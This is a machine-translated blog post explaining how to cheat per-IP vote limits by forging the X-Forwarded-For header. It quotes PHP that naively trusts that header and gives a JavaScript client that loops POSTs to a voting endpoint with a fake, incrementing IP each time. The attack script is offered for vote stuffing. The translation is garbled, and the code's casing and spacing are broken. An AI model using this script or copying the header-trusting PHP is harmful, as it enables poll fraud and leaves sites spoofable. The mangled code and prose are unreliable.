Counterfeit HTTP header X-Forwarded-For ticket refresh Analysis

/*
* Author blog: http://87year.info
* Article address: http://87year.info/2011/03/09/pseudo-build httpheader x-forwarded-forincoming Ticket/
* Note: Please bypass science popularization.
*/
Background:
The kids shoes gave a website a ticket. After reading the ticket, each IP Address can only vote for one vote. It's too troublesome to give up!
The next day, another shoes said they could use the X-Forwarded-For field in the forged HTTP header to vote.
Baidu has gone through the principle of X-Forwarded-For, which has been around For a long time.
X-Forwarded-For: the XFF header, which represents the real IP address of the client, that is, the HTTP request end. This header is added only when the HTTP proxy or Server Load balancer is passed.
It is not the standard request header information defined in RFC. You can find this item in the squid cache proxy server development documentation.
The standard format is as follows:
X-Forwarded-For: client1, proxy1, proxy2
From the standard format, we can see that the X-Forwarded-For header information can be multiple, separated by commas (,). The first item is the real client ip address, the rest is the IP address of the proxy or Server Load balancer that has been used before. Several IP addresses will appear after several IP addresses.
Wiki's X-Forwarded-For interpretation http://en.wikipedia.org/wiki/X-Forwarded-For
Analysis:
Since the Client IP address is forged, Let's first look at how to obtain the Client IP address (take php for example). This code is found in Baidu. This code may be used by most websites.
 
<? Php
$ User_IP = ($ _ SERVER ["HTTP_VIA"])? // Whether a proxy is used
$ _ SERVER ["HTTP_X_FORWARDED_FOR"]: $ _ SERVER ["REMOTE_ADDR"];
// If the retrieval fails, it will be obtained from REMOTE_ADDR.
$ User_IP = ($ user_IP )? $ User_IP: $ _ SERVER ["REMOTE_ADDR"];
?>
First, determine whether the HTTP_VIA header exists. The HTTP_VIA header indicates whether the proxy server is used. if not, obtain the Client IP address from the REMOTE_ADDR field. If yes, obtain the Client IP address from X-Forwarded-.
I guess many programmers use code from Baidu. asp is similar.
Then let's test it.
Server code:
 
<? Php
// Output HTTP_X_FORWARDED_FOR
Echo "HTTP_X_FORWARDED_FOR:". $ _ SERVER ["HTTP_X_FORWARDED_FOR"];
// Output REMOTE_ADDR echo "REMOTE_ADDR:". $ _ SERVER ["REMOTE_ADDR"];
?>

The obtained Client IP address is different. REMOTE_ADDR is the real IP address.
Therefore, if a website uses X-Forwarded-For to determine the IP address of the client, we can use this logic vulnerability to review the ticket.
Demo address: http://87year.info/t00ls/vote/index.html (right-click to view all client source code)

Client code:
<Script>
Function CreateXMLHttp (){
Var xmlhttp = false; // create a new variable and assign a value of false. If false is used as the judgment condition, the XMLHTTPRequest object has not been created.
Try {
Xmlhttp = new XMLHttpRequest (); // try to create an XMLHttpRequest object. all browsers except IE support this method.
} Catch (e ){
Try {
Xmlhttp = ActiveXobject ("Msxml12.XMLHTTP"); // use a newer version of IE to create an IE-compatible object (Msxml2.XMLHTTP ).
} Catch (e ){
Try {
Xmlhttp = ActiveXobject ("Microsoft. XMLHTTP"); // use older IE versions to create IE-compatible objects (Microsoft. XMLHTTP ).
} Catch (failed ){
Xmlhttp = false; // keep it false if it fails.
}
}
}
Return xmlhttp;
}
Var g_ I = 0;
Function $ (obj ){
Return document. getElementById (obj );
}
Function onSearch ()
{
Var g_xmlhttp = CreateXMLHttp ();
If (g_xmlhttp = false)
{
Alert ("your browser does not support ajax ");
Return;
}
Var sendData = "bid =" + $ ("id"). value;
Var fakeIP = $ ("ip"). value + g_ I;
// Alert (fakeIP); return;
G_xmlhttp.open ("POST", "http: // 192.168.15.166/ip. php", true );
G_xmlhttp.setRequestHeader ("Content-Length", sendData. Length );
G_xmlhttp.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded ");
G_xmlhttp.setRequestHeader ("X-Forwarded-For", fakeIP );
G_xmlhttp.onreadystatechange = function (){
If (/* g_xmlhttp.status = 200 */g_xmlhttp.readyState = 4)
{
$ ("Res"). innerHTML + = g_xmlhttp.responseText + "</br> ";
If (++ g_ I <5)
{
SetTimeout ("onSearch ()", 1000 );
}
}
}
G_xmlhttp.send (sendData );
}
</Script>
<Form name = "form1" method = "post" action = "" id = "form1">
<Div>
<Br/>
Ip address: <input id = "ip" type = "text" value = "200.156.4."/> </br>
Voting ID: <input id = "id" type = "text" value = "232"/> </br>
<Input id = "search" type = "button" value = "start"/>
<Br/>
<Br/>
<Span id = "res"> </span>
<Br/>
<Br/>
</Div>
</Form>
 
Reference 1: http://www.sablog.net/blog/x-forwarded-for/
Reference 2: http://en.wikipedia.org/wiki/X-Forwarded-For
Reference 3: http://www.baidu.com